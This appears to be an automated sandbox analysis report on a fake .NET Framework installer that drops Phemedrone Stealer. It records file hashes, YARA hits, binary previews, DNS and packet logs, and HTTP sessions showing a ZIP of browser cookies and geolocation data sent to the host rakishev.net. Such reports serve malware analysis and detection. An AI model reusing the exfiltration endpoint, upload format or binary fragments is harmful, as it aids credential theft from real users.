                                                            SSDEEP:12:MXdLOffQalGYT9Lu+30pfHw7Oo+FDDPOJD8zZi9LRJnVYn8lIz2:MNifQallTv3MswTbYZIz2
                                                            MD5:FF86F79D948C6F43BDE1852C1C66A829
                                                            SHA1:56A223843B07CE5077287CAED98F41ED904E53D6
                                                            SHA-256:FEB27E2D4F63A3ADB399D74E2A7199ABD5C9582AFC0618F968C260A913D6C885
                                                            SHA-512:FCD987163B6D7EC8873ECB95EE16C28EC0B524B5C5AE7D34F24DEC15727C80F3D0B11E8608AC3C2153D7DBE413CBD9EC0841F71BB6DDE64DD1C6904531E38CBD
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang2057{\fonttbl{\f0\fnil\fcharset0 MS Shell Dlg 2;}}..\viewkind4\uc1\pard\ul\b\f0\fs23 Details\ulnone\b0\fs17\par..\par..\pard{\pntext\f0 1.\tab}{\*\pn\pnlvlbody\pnf0\pnindent0\pnstart1\pndec{\pntxta.}}..\li175 Microsoft .NET Framework 4 is already a part of this operating system. You do not need to install the .NET Framework 4 redistributable. \v <A HREF="http://go.microsoft.com/fwlink/?LinkId=164207">\v0 More information\v </A>\v0 . \par..\pard\li175\par..\pard{\pntext\f0 2.\tab}{\*\pn\pnlvlbody\pnf0\pnindent0\pnstart2\pndec{\pntxta.}}..\li175 Same or higher version of .NET Framework 4 has already been installed on this computer.\par..\pard\par..\par..\par..}...
                                                            Process:C:\Users\user\Desktop\dotNetFx40_Full_setup.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):84992
                                                            Entropy (8bit):5.7667868438849075
                                                            Encrypted:false
                                                            SSDEEP:1536:+9EQCqXnMyJ5ePGTtS92QWKSO5T3rZSSwEKSKO9jzpmN:+9EkM+MPou2hS5TbZLwEKSKO9jV4
                                                            MD5:AE881BAA8C3A00A94E5994826BDAC3AA
                                                            SHA1:3F81A9E1CB712B2F69C8AB9104469A436C797706
                                                            SHA-256:2C669F5390B14C63C91F4898419792AAEE9C0B996DC348419E2EE84179CF3531
                                                            SHA-512:2E1845235D5CB2C710AB8DB068CC9CF744CCD2809E8293EF4CE27D090D071A645524D23517F74BF841ACA21DDEEA7DAA21621B537A63A7EC356DB7BE6DFC21FC
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, Author: Joe Security
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p.d.........."...0..B...........`... ........@.. ....................................@.................................|`..O.................................................................................... ............... ..H............text....@... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B.................`......H...........|...........................................................PK......................................PK......PK......PK......PK....{....*..{....*V.(......}......}....*. 6.j. )UU.Z(.....{....o!...X )UU.Z(.....{....o"...X*..{%...*..{&...*V.(......}%.....}&...*. .V0; )UU.Z(.....{%...o!...X )UU.Z(.....{&...o"...X*..{'...*..{(...*V.(......}'.....}(...*. .1.. )UU.Z(.....{'...o!...X )UU.Z(.....{(...o"...X*..(....*.s.........*..o+...*..(...+*J...-...s4...s5...*..o6...*..o7
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):1014
                                                            Entropy (8bit):5.272596676041869
                                                            Encrypted:false
                                                            SSDEEP:24:PFtMTxgB03zkjwbYztjyxvqSqv/oLK4Fq8vjHIWtC7TFjH62XUNRc0I1/:9tMNSwMzte8nvl4FIWQ69I
                                                            MD5:9E1463553A6AC05B3B12FE5DECFC641C
                                                            SHA1:4E0EEE9C1FCC6F838C9A9F7B75996FB98ADE7D83
                                                            SHA-256:0D4E6E856CC678C2647E786BC17185D5C9054B3B28CABE8CC627FA8C14597C29
                                                            SHA-512:760F2230981334804AE6E4889BB9DF4BEAB7CA3817C1FFC618EE8944F85091E16666EF508E08119FCE435C3BE2B990F5C081BEED9BC37CAB717A5FB871CCC8D2
                                                            Malicious:false
                                                            Preview:[10/4/2023, 15:57:50] === Logging started: 2023/10/04 15:57:50 ===..[10/4/2023, 15:57:50] Executable: C:\ProgramData\Start Menu\G5K9HNJ7.exe v4.0.30319.1..[10/4/2023, 15:57:50] --- logging level: standard ---..[10/4/2023, 15:57:50] Successfully bound to the ClusApi.dll..[10/4/2023, 15:57:50] Error 0x800706d9: Failed to open the current cluster..[10/4/2023, 15:57:50] Cluster drive map: ''..[10/4/2023, 15:57:50] Considering drive: 'C:\'.....[10/4/2023, 15:57:50] Considering drive: 'D:\'.....[10/4/2023, 15:57:50] Drive 'D:\' is rejected because of the unknown or unsuitable drive type..[10/4/2023, 15:57:50] Drive 'C:\' has been selected as the largest fixed drive..[10/4/2023, 15:57:50] Directory 'C:\6c8944922f7b98d0b6cd82b768\' has been selected for file extraction..[10/4/2023, 15:57:50] Extracting files to: C:\6c8944922f7b98d0b6cd82b768\..[10/4/2023, 15:57:52] Extraction took 1.610 seconds..[10/4/2023, 15:57:52] Executing command line: 'C:\6c8944922f7b98d0b6cd82b768\\Setup.exe /x86 /x64
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:GIF image data, version 89a, 15 x 15
                                                            Category:dropped
                                                            Size (bytes):663
                                                            Entropy (8bit):5.949125862393289
                                                            Encrypted:false
                                                            SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                                                            MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                                                            SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                                                            SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                                                            SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                                                            Malicious:false
                                                            Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):4.076008494109653
                                                            Encrypted:false
                                                            SSDEEP:3:iYL23KpRMKLXZ/zxs5JMUmov5seLWWklwWlY1MaaRckN:niKRMKzZmhrqQ1bJE
                                                            MD5:E6A616752683C8C4BD774B8B6B8F404D
                                                            SHA1:3D0F20BAF87F11AC406AA31B305E8D52F033C7FF
                                                            SHA-256:EF7E0D276A429A5ED7D54CFDD61B122D37F778518BDFE7D7120CFA4C2C785FF2
                                                            SHA-512:619A2A27A3EDC5D62D5C923C9CB1532FEB55B2D92737D27842D86CCB885E23FB79DF797253ED02C9A2DA1CAC6C77FEAE071F9B189BB4ED8DDD6D4433F573482C
                                                            Malicious:false
                                                            Preview:............................................................\par..}...nformation\v </A>\v0 . \par..\pard\li175\par..\pard{\pntext\........Wy%...O.}..i.....VO..=.h
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):30
                                                            Entropy (8bit):1.2389205950315936
                                                            Encrypted:false
                                                            SSDEEP:3:T8u1:wu
                                                            MD5:0A4E28764876BF78EB12224249AE4012
                                                            SHA1:A1E754CE287CC02A4A121F94815934381F926678
                                                            SHA-256:FC68B1B8D79F38BEB741DF357B52BC67E0BD4FEA82131388DD20C661C44666D7
                                                            SHA-512:0D7BB555246B2886D870ACC31FD4F749A940A7B78CA8A0364ABE51A52D9392FC64166F167E13F90390770932BAF9F8E1622FD8ED7416942CE430342048545C18
                                                            Malicious:false
                                                            Preview:.....Y........................
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):12
                                                            Entropy (8bit):0.41381685030363374
                                                            Encrypted:false
                                                            SSDEEP:3:/l:
                                                            MD5:E4A1661C2C886EBB688DEC494532431C
                                                            SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                            SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                            SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                            Malicious:false
                                                            Preview:............
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):12
                                                            Entropy (8bit):0.41381685030363374
                                                            Encrypted:false
                                                            SSDEEP:3:/l:
                                                            MD5:E4A1661C2C886EBB688DEC494532431C
                                                            SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                            SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                            SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                            Malicious:false
                                                            Preview:............
                                                            File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):3.964172235162529
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:dotNetFx40_Full_setup.exe
                                                            File size:2'605'056 bytes
                                                            MD5:5d4392b56aa4ebac400bbe86fe5d0767
                                                            SHA1:a68a6004e111ba899254aa015d93706037c447ff
                                                            SHA256:a604eed1325b12671370e268783cfa74f8675a468492ff98416187d73768b4af
                                                            SHA512:a2de9b684163bfad13aa23f76f32b4122ef8b9dd3a4ab557d1b395c13aafa62fd475a657cb4cc79183543a0ac2444dc457586ae17079764c27a5ffc94c8230f9
                                                            SSDEEP:49152:o3s23i7y2K9TYDnORn+JuXbOoGlQXlSHcBA5TkfZnIZirM5RxivYp:
                                                            TLSH:98C5F7203DFB101DB3B3AFA95FD8B8AE996FF773270A64A9106103464712D81DD92739
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i>............"...0...'...........'.. ....'...@.. ....................... (.......'...@................................
                                                            Icon Hash:90cececece8e8eb0
                                                            Entrypoint:0x67d7ae
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows cui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0xB8EB3E69 [Mon Apr 23 16:38:01 2068 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x27d758         0x53          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x27e000         0x248         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x280000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy              Characteristics
.text   0x2000           0x27b7b4      0x27b800  unknown   unknown          unknown    unknown              IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x27e000         0x248         0x400     False     0.3056640625     data       3.526286411687027    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x280000         0xc           0x200     False     0.044921875      data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA       Size   Type                                                                              Language  Country  ZLIB Complexity
RT_MANIFEST  0x27e058  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                    0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                            Oct 4, 2023 15:58:03.983822107 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.984016895 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.984020948 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.984069109 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.984155893 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.163698912 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.163852930 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.312839031 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.312854052 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.312897921 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.312911034 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.312921047 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.312966108 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.313051939 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.313091993 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.313216925 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.462013006 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.462196112 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.462272882 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.462595940 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.611232042 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.611257076 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.611485004 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.611605883 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.761475086 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.761492968 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.761661053 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.761706114 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.761718035 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.761775970 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.910245895 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.910263062 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.910268068 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.910275936 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.910284996 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.910330057 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.910340071 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.910350084 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.910350084 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.910464048 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.065999985 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.164649963 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.164855957 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.165110111 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.165467024 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.214581013 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.314302921 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.314500093 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.314510107 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.314558029 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.314656973 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.314698935 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.463164091 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.463191986 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.463299036 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.611989021 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.612039089 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.612214088 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.761017084 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.761035919 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.761045933 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.761055946 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.761066914 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.761077881 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.761123896 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.761169910 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.909851074 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.909883976 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.909893990 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.909902096 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.909910917 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.909924030 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.909976006 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:06.178016901 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.178144932 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:06.326761961 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.326782942 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.326793909 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.326803923 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.326813936 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.326823950 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.326833010 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.326924086 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:06.475572109 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.475588083 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.475600004 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.475610971 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.475620985 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.475630045 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.475640059 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.475661993 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:06.475713968 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:06.475728989 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:06.624408960 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.624425888 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.624435902 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.624445915 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.624455929 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.624655962 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:06.773262024 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.773279905 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.773288012 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.773297071 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.773308039 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.773324966 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.773492098 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:06.922204971 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.922234058 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.922245026 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:08.536003113 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:08.545341015 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:08.546282053 CEST4968380192.168.2.4208.95.112.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 4, 2023 15:57:52.330095053 CEST | 54477 | 53 | 192.168.2.4 | 1.1.1.1
Oct 4, 2023 15:57:52.480081081 CEST | 53 | 54477 | 1.1.1.1 | 192.168.2.4
Oct 4, 2023 15:57:59.671328068 CEST | 59201 | 53 | 192.168.2.4 | 1.1.1.1
Oct 4, 2023 15:57:59.858555079 CEST | 53 | 59201 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 4, 2023 15:57:52.330095053 CEST | 192.168.2.4 | 1.1.1.1 | 0xdc57 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Oct 4, 2023 15:57:59.671328068 CEST | 192.168.2.4 | 1.1.1.1 | 0x1521 | Standard query (0) | rakishev.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 4, 2023 15:57:52.480081081 CEST | 1.1.1.1 | 192.168.2.4 | 0xdc57 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Oct 4, 2023 15:57:59.858555079 CEST | 1.1.1.1 | 192.168.2.4 | 0x1521 | No error (0) | rakishev.net |  | 104.21.88.34 | A (IP address) | IN (0x0001) | false
Oct 4, 2023 15:57:59.858555079 CEST | 1.1.1.1 | 192.168.2.4 | 0x1521 | No error (0) | rakishev.net |  | 172.67.150.79 | A (IP address) | IN (0x0001) | false

                                                            • ip-api.com
                                                            • rakishev.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49683 | 208.95.112.1 | 80 | C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe

Timestamp | kBytes transferred | Direction | Data
Oct 4, 2023 15:57:52.643373966 CEST | 1 | OUT | GET /json/?fields=11827 HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Oct 4, 2023 15:57:52.793297052 CEST | 1 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 04 Oct 2023 13:57:52 GMT
                                                            Content-Type: application/json; charset=utf-8
                                                            Content-Length: 191
                                                            Access-Control-Allow-Origin: *
                                                            X-Ttl: 60
                                                            X-Rl: 44
                                                            Data Ascii: {"country":"United States","countryCode":"US","city":"Phoenix","zip":"85034","isp":"Performive LLC","org":"Total server solutions LLC","as":"AS46562 Performive LLC","query":"184.170.240.238"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49687 | 104.21.88.34 | 80 | C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe

Timestamp | kBytes transferred | Direction | Data
Oct 4, 2023 15:58:00.013323069 CEST | 2 | OUT | POST /wp-load.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------------------------8dbc4f2ae4bdbe9
Host: rakishev.net
Content-Length: 486789
Expect: 100-continue
Connection: Keep-Alive
Oct 4, 2023 15:58:00.237932920 CEST | 3 | IN | HTTP/1.1 100 Continue
Oct 4, 2023 15:58:00.239152908 CEST | 15 | OUT | Data Ascii: ------------------------------8dbc4f2ae4bdbe9Content-Disposition: form-data; name="file"; filename="(US)user-184.170.240.238-Phemedrone-Report.zip"Content-Type: application/octet-streamPK9DWe*##(HBrowser Data/Cookie
Oct 4, 2023 15:58:00.688889980 CEST | 30 | OUT | Data Ascii: /t.me/TheDyer `Y' Tag: proliv ----- Geolocation Data -----IP: 184.170.240.238Country: United States (US)City: PhoenixPostal: 85034MAC:
Oct 4, 2023 15:58:08.536003113 CEST | 653 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 04 Oct 2023 13:58:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/5.6.40
                                                            Set-Cookie: PHPSESSID=odijf1qt1a57ao77oc6li8naq3; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EyoCptb6%2BC1y5jFynoGoFFMw8FIhV6q1wxqKwloIJYXHkryFZEmvVjvAAT9z9nmx3yAB0hRj%2Bla9dwXNtf5S2rwqtOpab86tuKGqOCyUDvOyEwt5eKSMi6%2FILEv0l3s%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 810defeaf9e30ff5-LAX
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Ascii: 0


                                                            Target ID:0
                                                            Start time:15:57:49
                                                            Start date:04/10/2023
                                                            Path:C:\Users\user\Desktop\dotNetFx40_Full_setup.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\user\Desktop\dotNetFx40_Full_setup.exe
